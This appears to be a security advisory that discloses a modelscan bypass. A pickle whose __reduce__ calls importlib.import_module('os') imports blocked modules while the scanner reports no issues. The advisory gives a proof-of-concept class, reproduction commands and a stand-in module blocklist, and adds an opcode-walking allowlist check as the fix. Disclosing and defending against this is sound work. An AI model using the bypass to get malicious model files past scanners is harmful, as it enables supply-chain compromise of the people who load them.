
Modelscan Bypass: importlib.import_module Meta-Bypass

Summary

importlib.import_module is NOT in modelscan's unsafe_globals blocklist. Because a pickle can name it as the callable and pass any module name as the argument, this lets a pickle import ANY module, including all of the blocked ones (os, subprocess, sys, etc.).

Impact: CRITICAL

This is a meta-bypass: it defeats the blocklist mechanism itself rather than one entry in it, so adding more module names to the list does not close it. A pickle whose __reduce__ resolves to a single importlib.import_module('os') call passes modelscan with "No issues found", even though unpickling it hands the attacker the os module.

Reproduction

pip install modelscan
modelscan scan -p model.pkl
# Output: "No issues found"

python3 -c "import pickle; obj = pickle.load(open('model.pkl','rb')); print(type(obj))"
# Output: <module 'os' from '...'>

Root Cause

The modelscan v0.7.6 blocklist (unsafe_globals in settings.py) matches the globals a pickle references against ~20 specific modules. importlib is not among them, and importlib.import_module performs its import at call time rather than at reference time, so a reference to it passes the check and can pull in any of the listed modules.

PoC Details

  • File: model.pkl (51 bytes)
  • Technique: __reduce__ returns (importlib.import_module, ('os',))
  • Protocol: pickle protocol 2
  • modelscan version tested: 0.7.6
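As an added example (not the PoC file shipped in this repository and not modelscan's code), the snippet below builds the same kind of pickle the card describes, then walks the opcode stream with pickletools to list every global the pickle imports without executing it. A stand-in blocklist holding the module names the card mentions misses the importlib reference, while an allowlist of the globals a model is expected to need flags it. The blocklist and allowlist contents, and the helper names, are assumptions for illustration, not modelscan's settings.

```python
import importlib
import pickle
import pickletools


class ImportModulePoC:
    """Unpickles to importlib.import_module('os'): the technique the card describes."""

    def __reduce__(self):
        return (importlib.import_module, ("os",))


def build_poc_pickle(protocol: int = 2) -> bytes:
    """Serialise the PoC object; the card's file uses pickle protocol 2."""
    return pickle.dumps(ImportModulePoC(), protocol=protocol)


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """List every (module, name) the pickle will import, without unpickling it.

    Walks the opcode stream with pickletools.genops, so nothing runs.
    Handles GLOBAL (protocols 0-3) and STACK_GLOBAL (protocol 4+), which
    takes module and name from the two most recently pushed strings.
    """
    found: list[tuple[str, str]] = []
    strings: list[str] = []  # recently pushed string operands, for STACK_GLOBAL
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "STACK_GLOBAL":
            name = strings.pop()
            module = strings.pop()
            found.append((module, name))
    return found


# Stand-in blocklist (an assumption for illustration, not modelscan's actual
# unsafe_globals): the module names the card says are blocked.
STANDIN_BLOCKLIST = {"os", "subprocess", "sys"}


def blocklist_findings(data: bytes) -> list[tuple[str, str]]:
    """Blocklist check: flag a global only if its module is on the list.
    importlib is not listed, so the PoC yields no findings."""
    return [g for g in referenced_globals(data) if g[0] in STANDIN_BLOCKLIST]


# Stand-in allowlist (also an assumption): the only globals a given model
# format is expected to need. Everything else is reported, which catches
# importlib.import_module and any other unlisted importer.
STANDIN_ALLOWLIST = {
    ("collections", "OrderedDict"),
    ("numpy", "ndarray"),
    ("numpy.core.multiarray", "_reconstruct"),
}


def allowlist_findings(data: bytes) -> list[tuple[str, str]]:
    """Allowlist check: flag every global that is not explicitly permitted."""
    return [g for g in referenced_globals(data) if g not in STANDIN_ALLOWLIST]


def unpickled_module_name(data: bytes) -> str:
    """Actually load the PoC (harmless here: it only imports os) to show
    what the "clean" file evaluates to."""
    return pickle.loads(data).__name__


if __name__ == "__main__":
    poc = build_poc_pickle()
    print("globals referenced:", referenced_globals(poc))
    print("blocklist findings:", blocklist_findings(poc))
    print("allowlist findings:", allowlist_findings(poc))
    print("unpickled object:", unpickled_module_name(poc))
```

The opcode walk is the part worth keeping: it sees exactly what the unpickler would resolve, for both GLOBAL and STACK_GLOBAL encodings, so the same pickle cannot hide the reference by changing protocol. Whether a finding is raised then depends only on the policy applied to that list, which is why an allowlist closes this class of bypass and a blocklist cannot.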